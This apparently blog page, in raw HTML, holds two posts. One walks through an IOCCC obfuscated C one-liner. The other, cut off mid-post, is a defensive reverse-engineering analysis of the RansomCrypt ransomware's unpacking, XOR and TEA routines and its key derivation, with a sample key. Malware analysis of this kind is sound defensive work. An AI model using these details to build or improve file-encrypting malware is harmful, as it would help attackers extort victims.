<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: small;">(_
+ _ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">&
</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">56
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">>
_) ? ... : </span><span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">32</span></span><br />
<span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;"> </span>
</span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Mmm, not easy to follow all this arithmetic. Let's rewrite this line with parentheses to highlight the operator precedence:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;"> </span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: small;">( (_
+ (_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">)</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">&
(</span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">56
</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">>
_) ) ? ... : </span><span style="color: #1c00cf; font-size: small;"><span style="font-family: 'Courier New', Courier, monospace;">32</span>
</span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Ha! Much better! When this evaluates to false, the space character is printed on screen (32 decimal = 0x20 hex, the ASCII code for space).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">We know from the output that the code alternates spaces with other characters ("." or "o"), so the above condition must evaluate to false at alternate values of the counter.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">First of all, 56 is the upper limit for the characters to be printed. The expression "56 > _" is true for every iteration before the counter reaches 56 (can you guess what happens from there on? :P).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The other part of the formula, instead ("</span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">(_ + (_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">))</span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">"), is more interesting: the code adds to the counter the result of the integer division of the counter by 21.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Let's explain it better: counter / 21 results in 0 for the first 20 iterations, in 1 for the following 21, and in 2 for the remaining ones. The result of this sum is then "and-ed" with the value 1 (that is, the "true" resulting from "56 > _"). </span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So, in the first line, the counter is left unchanged, and all the even values of the counter and-ed with 1 will return false. Why? Because the number 1 in binary is... well... 1 :).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Every multiple of two, instead (that is, every even value of the counter), once translated into binary corresponds to a number whose least significant bit is 0. This means that in every iteration where the counter is even the "and" operation looks like this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">bbbbb0 and</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">000001</span></span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">where "b" is a bit that can be either 0 or 1. Of course the result of this "and" will always be false. On the other hand, it will always be true for odd values of the counter (because all odd values have the least significant bit set to 1).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">BUT! This is only valid for the first line of the output! In the second line the expression "</span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">" results in 1, which is then added to the counter.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So, the whole thing now works the opposite way: when the counter is even, it is incremented by one and it becomes odd, causing the whole ternary operator to evaluate to true. When it's odd instead, the increment makes it even, causing the ternary operator to evaluate to false, and therefore a space is printed on the screen.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Finally, the last line of the output begins with TWO spaces!! How is that possible? Well, the reason is in the chosen number "21"!</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The output lines are in fact aligned on multiples of 20, while the check on alternate spaces is aligned on multiples of 21. This means that the check on alternate spaces is off by one with respect to the alignment of the lines.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">In the third line you start with iteration 41 (well, actually iteration 42, which gets decremented to 41). For the line alignment this value of the counter is the first element of the third line (the third set of 20), while for the space alignment it is the last element of the second line (the second set of 21).</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Now the third and most nested operator is left:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">strchr(</span><span style="color: #1c00cf; font-size: small;">1</span><span style="font-size: small;">[l],
_ ^ </span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">])?
</span><span style="color: #1c00cf; font-size: small;">111
</span><span style="font-size: small;">:
</span><span style="color: #1c00cf; font-size: small;">46</span><br />
<span style="color: #1c00cf; font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This is quite simple, but also quite interesting for the notation it uses. </span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">First we see it returns one of two values, 111 or 46 (ASCII values for "o" and "."), corresponding respectively to a char that is present and to a char that is not present in the input parameter string.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">How is the check performed? Simply with the strchr() function.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This function searches for a char in a string, and returns a pointer to that char if it is found, or NULL otherwise (which evaluate to true and false respectively). The first parameter is weird! </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">We have:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><span style="color: #1c00cf; font-size: small;"> 1</span><span style="font-size: small;">[l]</span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">No, it's not a typo! Here 1 is the "array", and the char **l is the "index". How is that possible? Well, the semantics of the C language allow this weird notation: normally, when using an array, the code resolves it like this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">type array[n] --> array + n*sizeof(type)</span><span style="font-size: small;">
</span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">in order to calculate the pointer to reach the n-th element in the array. In the case of this IOCCC code, instead, the compiler does this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">char *test = 1[l];</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">----------------------------------------------<br /> mov eax,dword ptr [ebp+0Ch] ; eax = array address<br /> mov ecx,dword ptr [eax+4] ; ecx = element at address + 4<br /> mov dword ptr [ebp-4],ecx ; element is stored in test</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><br /></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Remember that "l" is a char**, meaning that it is an array of pointers, and on this 32-bit build each element is 4 bytes. We access element 1, so 1*4 = 4. Therefore, even when the index and the array are swapped, we still have</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">type n[array] -> array + n*sizeof(type)</span><br />
<span style="font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">that is, the pointer is still calculated and resolved correctly.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So this whole 1[l] thing is simply accessing argv[1], that is, the first parameter passed on the command line.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Going back to the strchr function, we see another similar trick in the second parameter:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">]</span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This time the trick is more intuitive: the string literal is treated as an array of chars, and C allows you to use the [] notation to access its elements. This is completely equivalent to the more "normal" form:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">char Array[] = </span></span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"<span style="color: black;">;</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">...</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">char test = Array[_/2];</span></span><br />
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Ok, we know that the first parameter of the strchr is the string passed in the command line, but what about this second one? We see the counter makes an appearance. It is divided by two because we have seen it prints alternatively characters and spaces. Also, we see the character extracted from the string array is xored with the counter itself! This looks like some sort of partial encryption :P</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Anyway, at every odd iteration a character is extracted from the above string, and after the xor with the counter it results in the n-th character of the keyboard (qwertyuio... etc). This character is then searched in the input parameter string, and if it is found the character "o" is returned by the ternary operator (and printed on the screen), or else the character "." is returned.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="color: #274e13;">Riddle</span>: because of the way the loop is calculated, some characters from the above string are skipped and never used, can you figure out which ones?</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The last, final, question is: which is the condition that stops the loop?</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The loop is performed through the recursive formula we saw in the beginning:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _ && main(</span></span><span style="color: #1c00cf; font-size: small;">2</span><span style="color: #1a1a1a;"><span style="font-size: small;"> + _, l);</span></span><br />
<span style="color: #1a1a1a;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">This is a logical "and": the first part stands for the termination condition, while the second one is the core of the recursion. Both the sides of the formula must evaluate to true in order for the recursion to work; the second part, though<span style="font-family: Verdana, sans-serif;">, only contains the "main" which doesn't return any value.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">So this leaves us with only the first part that controls the iteration: the code will evaluate the first part of the formula, and if it is true it will try and evalute the second part (the "main"), but this part is a function, therefore the code will have to call the function in order to determine whether this function will return true or false. But this function is recursive! Therefore it doesn't matter what the "main" evaluates to, the recursion will cause the code to always follow it in any case.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">The only way to terminate this loop is when the first part of the formula evaluates to false. This way, the code knows a priori that the second part of the formula can't make a difference, so it will not evaluate it, causing the recursion not to happen.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The first part of the formula is simply:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _</span></span></div>
<span style="color: #1a1a1a;"><span style="font-size: small;"> </span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">when is this false? Well, remember that every line of output is of 20 chars? Every time the counter is a multiple of 20 a "\n" is printed (ascii code is 10 decimal).</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">In the last iteration, after the third line, the counter reaches the value 60. This is a multiple of 20, therefore the "\n" is printed by the expression within the "putchar" argument. Also, the printed charater is returned by "putchar" (that is, it returns 10). We see the return value (10) is multiplied by 6, then xored with the counter itself. Let's do the simple math:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">(6*10) ^ 60</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">the result of this is 0, which logically evaluates to false, so we can see that only when the execution counter reaches the value of 60 the recursion will be interrupted, causing the code to get out of the nested recursions it has done so far, and ultimately terminate the program execution.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">And that's all for this little one liner: very small code, but dense contents! It is very interesting to analyze tricky codes like this because you find a lot of quirks that you never see in "normal" C source codes, and you also learn a lot about the internal working of the C itself.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">My congratulations to the author Taketo Konno for designing this very clever piece of code, which well deserves the "best one liner award" :)</span></span></span><br />
<br />
<br />RansomCrypt: an analysis of its crypto routines. (2012-04-20)<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">About a week ago, I noticed a new crypto ransomware (remember </span><a href="http://en.wikipedia.org/wiki/PGPCoder"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">gpcode</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">?): </span><i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">W32/RansomCrypt</span></i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">. The news came from the </span><a href="http://www.f-secure.com/weblog/archives/00002347.html"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">F-Secure website</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">. So, as soon as I gathered a sample I started my analysis, but just when I was about to finish it... A twitter update told me that F-Secure had already done the work with the </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://www.f-secure.com/weblog/archives/00002349.html">decryption script</a>!</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Anyway here you can find some additional details about the encryption/decryption and the way it works.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The first executable I came across was coded in Visual Basic and was packed with a modified UPX version.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After unpacking the sample, I started searching for standard encryption routines, but nothing caught my attention. However the sample did contain encrypted data, and debugging some routines that looked like home made decryption code, I ended up finding a second encrypted executable within the first one.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Luckily, this second executable wasn't coded in Visual Basic (if you have tried to reverse some VB executable you know what I mean!), this one was also packed, but with standard UPX. Again, I unpacked it and began searching for some encryption routines. I found three candidates: a 16-bytes xor, and two TEA routines (both encryption and decryption).</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">(If you haven't ever reversed TEA, here's a little trick to recognize it: in most cases you just have to look for the magic constant </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">0x9E3779B9</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> and the work is done.)</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I also noticed some interesting APIs: FindResource, SizeofResource, LoadResource, LockResource. They made me look into the resources of the file, where I found an encrypted block. Once decrypted, this block revealed the malware configuration.</span><br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywP0t7cm5y_o4YfXWmJhjF8qnbuaOfB3jyetDRKUV2SvSsQ0ulUtbxvjuMSwCbkybPpweAunyrcaCopYM5-JusQw3mFZJSOKUGijafBjTTlOWDj_BuoOE7JqXP0JWGzlL3lXLuYj4GWk/s1600/shot2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywP0t7cm5y_o4YfXWmJhjF8qnbuaOfB3jyetDRKUV2SvSsQ0ulUtbxvjuMSwCbkybPpweAunyrcaCopYM5-JusQw3mFZJSOKUGijafBjTTlOWDj_BuoOE7JqXP0JWGzlL3lXLuYj4GWk/s1600/shot2.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To decrypt the configuration, I debugged this decryption routine and found out that the first 16 bytes of the resource were the key for the decryption of the configuration block. The decryption algorithm was the 16-bytes xor routine I had noted earlier.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then I noticed a loop scanning for all the files in the system, and I thought that it was probably the same that also encrypted them.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I set a breakpoint there, and followed the key generation algorithm: the malware uses the same key employed to decrypt the configuration block, but it changes the endianness of every dword.</span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div>
<div>
<b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Key from the resource section:</span></b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">4A 2E 94 46 60 64 85 5B 5A 86 89 8C 7F 63 6C 50</span></span></div>
<div>
<b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Key with swapped endianness:</span></b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">46 94 2E 4A 5B 85 64 60 8C 89 86 5A 50 6C 63 7F</span></span></div>
</div>
<div>
<span class="Apple-style-span" style="color: #274e13;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This key, combined with the first byte of the targeted filename, leads to the final encryption key that will be used with TEA.</span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
